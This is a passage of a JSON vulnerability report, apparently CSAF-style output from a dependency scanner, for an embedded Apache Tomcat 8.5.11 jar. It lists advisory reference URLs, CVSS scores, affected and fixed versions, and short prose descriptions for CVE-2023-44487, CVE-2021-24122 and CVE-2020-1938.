List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"W3 Mailing List","url":"https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html"},{"summary":"Nginx Mailing List","url":"https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html"},{"summary":"Microsoft Advisory 2","url":"https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2"},{"summary":"CVE Record","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487"},{"summary":"F5 Advisory K000137106","url":"https://my.f5.com/manage/s/article/K000137106"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Openssf Advisory http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response","url":"https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"summary":"Seanmonstar Advisory hyper-http2-rapid-reset-unaffected","url":"https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected"},{"summary":"Gentoo Advisory glsa-202311-09","url":"https://security.gentoo.org/glsa/202311-09"},{"summary":"NetApp Advisory ntap-20231016-0001","url":"https://security.netapp.com/advisory/ntap-20231016-0001"},{"summary":"NetApp Advisory ntap-20240426-0007","url":"https://security.netapp.com/advisory/ntap-20240426-0007"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Cve 2023","url":"https://security.paloaltonetworks.com/CVE-2023-44487"},{"summary":"CVE Record","url":"https://ubuntu.com/security/CVE-2023-44487"},{"summary":"Bleepingcomputer Advisory new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records","url":"https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"summary":"Cve 2023","url":"https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"},{"summary":"Darkreading Advisory internet-wide-zero-day-bug-fuels-largest-ever-ddos-event","url":"https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"},{"summary":"Debian Advisory dsa-5540","url":"https://www.debian.org/security/2023/dsa-5540"},{"summary":"Debian Advisory dsa-5549","url":"https://www.debian.org/security/2023/dsa-5549"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"},{"summary":"Debian Advisory dsa-5570","url":"https://www.debian.org/security/2023/dsa-5570"},{"summary":"Eclipse Advisory msg00181","url":"https://www.eclipse.org/lists/jetty-announce/msg00181.html"},{"summary":"Haproxy Advisory haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487","url":"https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"summary":"Netlify Advisory netlify-successfully-mitigates-cve-2023-44487","url":"https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487"},{"summary":"Nginx Advisory http-2-rapid-reset-attack-impacting-f5-nginx-products","url":"https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/10/10/6"},{"summary":"Phoronix Advisory HTTP2-Rapid-Reset-Attack","url":"https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack"},{"summary":"Theregister Advisory http2_rapid_reset_zeroday","url":"https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-44487/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-24122"]}],"cve":"CVE-2021-24122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-05-13T22:30:02","ids":[{"system_name":"CVE Record","text":"CVE-2021-24122"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210212-0008"}],"notes":[{"audience":"developers","category":"other","text":"Use of Incorrectly-Resolved Name or Reference","title":"Additional CWE: 706"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Tomcat When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.  ## Related CVE(s) BIT-tomcat-2021-24122, CVE-2021-24122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.60"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/01/14/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"NetApp Advisory ntap-20210212-0008","url":"https://security.netapp.com/advisory/ntap-20210212-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"]}],"title":"CVE-2021-24122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1938"]}],"cve":"CVE-2020-1938","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2020-06-15T18:51:21","ids":[{"system_name":"CVE Record","text":"CVE-2020-1938"},{"system_name":"Blackberry Advisory","text":"articleDetail"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"Gentoo Advisory","text":"glsa-202003-43"},{"system_name":"NetApp Advisory","text":"ntap-20200226-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Privilege Management in Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Improper Privilege Management in Tomcat When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.  ## Related CVE(s) BIT-tomcat-2020-1938, CVE-2020-1938"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html"},{"summary":"Blackberry Advisory articleDetail","url":"http://support.blackberry.com/kb/articleDetail?articleNumber=000062739"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E"},{"summary":"Apache Mailing 